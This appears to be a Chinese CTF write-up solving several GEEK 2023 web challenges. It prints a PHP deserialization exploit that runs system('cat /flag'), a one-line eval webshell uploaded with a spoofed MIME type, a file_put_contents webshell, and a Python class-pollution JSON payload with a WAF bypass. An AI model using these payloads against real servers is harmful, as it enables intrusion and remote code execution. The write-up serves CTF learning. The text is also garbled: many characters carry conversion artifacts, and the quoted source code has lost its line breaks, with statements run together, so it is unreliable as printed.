---

EzHttp

按照提示POST傳參
發(fā)現(xiàn)密碼錯誤
F12找到hint，提示./robots.txt

訪問一下，得到密碼
然后就是http請求的基礎(chǔ)知識
抓包修改

最后就是

我們直接添加請求頭O2TAKUXX: GiveMeFlag
得到flag

unsign

源碼

<?php
highlight_file(__FILE__);
class syc
{public $cuit;public function __destruct(){echo("action!<br>");$function=$this->cuit;return $function();}
}class lover
{public $yxx;public $QW;public function __invoke(){echo("invoke!<br>");return $this->yxx->QW;}}class web
{public $eva1;public $interesting;public function __get($var){echo("get!<br>");$eva1=$this->eva1;$eva1($this->interesting);}
}
if (isset($_POST['url'])) 
{unserialize($_POST['url']);
}?>

pop鏈

syc.__destruct -> lover.__invoke() -> web.__get()

exp

<?php
class syc
{public $cuit;
}class lover
{public $yxx;public $QW;
}class web
{public $eva1;public $interesting;
}$a=new syc();
$b=new lover();
$c=new web();
$a->cuit=$b;
$b->yxx=$c;
$c->eva1='system';
$c->interesting='cat /flag';
echo serialize($a);
?> 

得到flag

n00b_Upload

題目對文件名沒有檢測，后綴可以為php
然后檢測MIME類型，我們只需要修改為image/jpeg即可
文件內(nèi)容一句話木馬會被檢測，要修改為短標(biāo)簽

創(chuàng)建1.php，寫入

<?=@eval($_POST['shell']);?>

bp抓包修改MIME，上傳成功
訪問，命令執(zhí)行得到flag

easy_php

考點：換行繞過，intval函數(shù)繞過，sha1繞過，php解析特性

源碼

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);highlight_file(__FILE__);
include_once('flag.php');
if(isset($_GET['syc'])&&preg_match('/^Welcome to GEEK 2023!$/i', $_GET['syc']) && $_GET['syc'] !== 'Welcome to GEEK 2023!') {if (intval($_GET['lover']) < 2023 && intval($_GET['lover'] + 1) > 2024) {if (isset($_POST['qw']) && $_POST['yxx']) {$array1 = (string)$_POST['qw'];$array2 = (string)$_POST['yxx'];if (sha1($array1) === sha1($array2)) {if (isset($_POST['SYC_GEEK.2023'])&&($_POST['SYC_GEEK.2023']="Happy to see you!")) {echo $flag;} else {echo "再繞最后一步吧";}} else {echo "好哩，快拿到flag啦";}} else {echo "這里繞不過去，QW可不答應(yīng)了哈";}} else {echo "嘿嘿嘿，你別急啊";}
}else {echo "不會吧不會吧，不會第一步就卡住了吧，yxx會瞧不起你的！";
}
?> 

分析一下
利用換行符%0a繞過preg_match()函數(shù)；數(shù)組繞過sha1；利用科學(xué)計數(shù)法繞過intval函數(shù)；最后是php解析特性[會被解析成下劃線
得到flag

EzRce

考點：異或繞過、無參RCE

源碼如下

 <?php
include('waf.php');
session_start();
show_source(__FILE__);
error_reporting(0);
$data=$_GET['data'];
if(waf($data)){eval($data);
}else{echo "no!";
}
?> 

題目過濾了字母數(shù)字，應(yīng)該是無參rce，不過eval沒被過濾
用異或繞過，構(gòu)造如下

eval(next(getallheaders()));

發(fā)現(xiàn)權(quán)限不夠，那么我們寫馬蟻劍連接

file_put_contents('shell.php','<?php eval($_POST[1]);?>');

我們查看下權(quán)限，發(fā)現(xiàn)只有r

然后就是find命令查找能用的，發(fā)現(xiàn)有find命令，得到flag

ezpython

考點：python原型鏈污染

源碼

import json
import osfrom waf import waf
import importlib
from flask import Flask,render_template,request,redirect,url_for,session,render_template_stringapp = Flask(__name__)
app.secret_key='jjjjggggggreekchallenge202333333'
class User():def __init__(self):self.username=""self.password=""self.isvip=Falseclass hhh(User):def __init__(self):self.username=""self.password=""registered_users=[]
@app.route('/')
def hello_world():  # put application's code herereturn render_template("welcome.html")@app.route('/play')
def play():username=session.get('username')if username:return render_template('index.html',name=username)else:return redirect(url_for('login'))@app.route('/login',methods=['GET','POST'])
def login():if request.method == 'POST':username=request.form.get('username')password=request.form.get('password')user = next((user for user in registered_users if user.username == username and user.password == password), None)if user:session['username'] = user.usernamesession['password']=user.passwordreturn redirect(url_for('play'))else:return "Invalid login"return redirect(url_for('play'))return render_template("login.html")@app.route('/register',methods=['GET','POST'])
def register():if request.method == 'POST':try:if waf(request.data):return "fuck payload!Hacker!!!"data=json.loads(request.data)if "username" not in data or "password" not in data:return "連用戶名密碼都沒有你注冊啥呢"user=hhh()merge(data,user)registered_users.append(user)except Exception as e:return "泰酷辣,沒有注冊成功捏"return redirect(url_for('login'))else:return render_template("register.html")@app.route('/flag',methods=['GET'])
def flag():user = next((user for user in registered_users if user.username ==session['username']  and user.password == session['password']), None)if user:if user.isvip:data=request.args.get('num')if data:if '0' not in data and data != "123456789" and int(data) == 123456789 and len(data) <=10:flag = os.environ.get('geek_flag')return render_template('flag.html',flag=flag)else:return "你的數(shù)字不對哦!"else:return "I need a num!!!"else:return render_template_string('這種神功你不充VIP也想學(xué)?<p><img src="{{url_for(\'static\',filename=\'weixin.png\')}}">要不v我50,我送你一個VIP吧,嘻嘻</p>')else:return "先登錄去"def merge(src, dst):for k, v in src.items():if hasattr(dst, '__getitem__'):if dst.get(k) and type(v) == dict:merge(v, dst.get(k))else:dst[k] = velif hasattr(dst, k) and type(v) == dict:merge(v, getattr(dst, k))else:setattr(dst, k, v)if __name__ == '__main__':app.run(host="0.0.0.0",port="8888")

首先定義了user類，包括三個屬性，其中isvip值為false，子類hhh繼承user類，只有兩個屬性；接著就是/register路由，發(fā)現(xiàn)實例化的是hhh()，也就是無法改變isvip的值，然后調(diào)用merge方法；/login路由實現(xiàn)登錄功能；然后看向關(guān)鍵的/flag路由，會檢測user.isvip是否為真，接收參數(shù)num進(jìn)行if判斷返回flag；最后發(fā)現(xiàn)有merge方法說明原型鏈污染

我們用postman發(fā)送如下json數(shù)據(jù)
（__base__是為了指向父類user的isvip從而污染）

{"username":"1","password":"1","__class__":{"__base__":{"isvip":true}}
}

（后面參考其他師傅博客發(fā)現(xiàn)直接污染也行不需要用魔術(shù)方法）

發(fā)現(xiàn)有過濾，直接Unicode編碼

{"username":"1","password":"1","__class__":{"__base__":{"isvi\u0070":true}}
}

登錄進(jìn)去之后，看九幽玄天神功已經(jīng)是要你傳參了
直接+123456789繞過

ezrfi

考點：filterchain攻擊

打開題目，提示hint.py
測試了一會發(fā)現(xiàn)文件包含會拼接.py后綴
然后一步步解密，先base64發(fā)現(xiàn)是尊嘟假嘟
繼續(xù)解密后發(fā)現(xiàn)是rc4加密，用密鑰Syclover
很明顯的要用filterchain繞過
（注意構(gòu)造的命令長度需要是3的倍數(shù)，防止base64編碼出錯，長度不夠就手動添加a）

查詢跟目錄

得到flag